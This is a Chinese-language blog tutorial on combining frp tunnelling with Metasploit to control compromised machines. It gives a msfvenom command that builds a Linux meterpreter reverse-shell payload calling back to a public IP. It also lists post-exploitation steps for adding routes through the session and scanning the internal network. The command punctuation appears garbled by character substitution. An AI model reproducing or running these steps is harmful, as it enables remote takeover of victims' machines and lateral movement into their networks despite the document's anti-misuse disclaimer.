宣告: 嚴禁用作非法目的,謝絕一切形式的轉載。
在這裡對介紹瞭如何透過frp進行內網穿透。本篇 文章將frp與MSF結合起來,實現獲取被入侵機器(“肉雞”)的控制權。
網路拓撲
透過家庭kali主機,獲取到肉雞的meterpreter。
frp配置
frps
frp伺服器端配置檔案frps。ini如下:
使用了dashboard。透過dashboard可以檢視frp伺服器的狀態。
執行frps
。/frps -c frps。ini
frpc
frp客戶端配置檔案frpc。ini如下:
執行frpc
。/frpc -c frpc。ini
MSF
生成木馬
透過如下命令生成木馬,注意這裡的
LHOST是公網的ip,LPORT是上面frpc.ini的remote_port
。這是最重要的地方。
msfvenom -a x64 ——platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=47。92。90。25 LPORT=7002 -i 3 -f elf -o test_7002
獲取meterpreter
注意這裡的lhost是local
ip即127。0。0。1、lport是local
port即5555。這裡是埠進行了轉發。
獲取路由資訊
run get_local_subnets
自動新增路由
run post/multi/manage/autoroute
檢視路由資訊
run autoroute -p
注意這裡的閘道器是session 1。
掃描開放的埠
使用auxiliary/scanner/portscan/tcp模組進行埠掃描。
這些掃描大多數的噢沒有nmap強大,但是nmap在這裡不能直接使用,需要設定socks代理,後續文章會詳細介紹如何透過nmap進行掃描。
資料流
在“肉雞”出檢視7002埠的資料流。
在Kali中檢視ip=47。92。90。25的資料流。
公眾號
更多內容,歡迎關注我的微信公眾號:無情劍客。